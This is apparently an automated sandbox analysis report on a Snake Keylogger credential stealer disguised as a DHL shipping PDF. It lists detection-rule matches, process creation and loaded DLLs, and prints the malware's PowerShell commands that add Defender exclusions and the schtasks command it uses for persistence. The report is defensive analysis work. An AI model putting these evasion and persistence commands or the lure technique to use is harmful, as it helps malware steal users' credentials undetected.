Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PZgkJsntUXo.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, zYXs3Vc364X6vlA5mA.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/19@2/3

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Mutant created: \Sessions\1\BaseNamedObjects\TKGqVHcgU
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2454.tmp

Jump to behavior

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2181688467.000000000390D000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000319D000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000316E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Virustotal: Detection: 50%
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File read: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
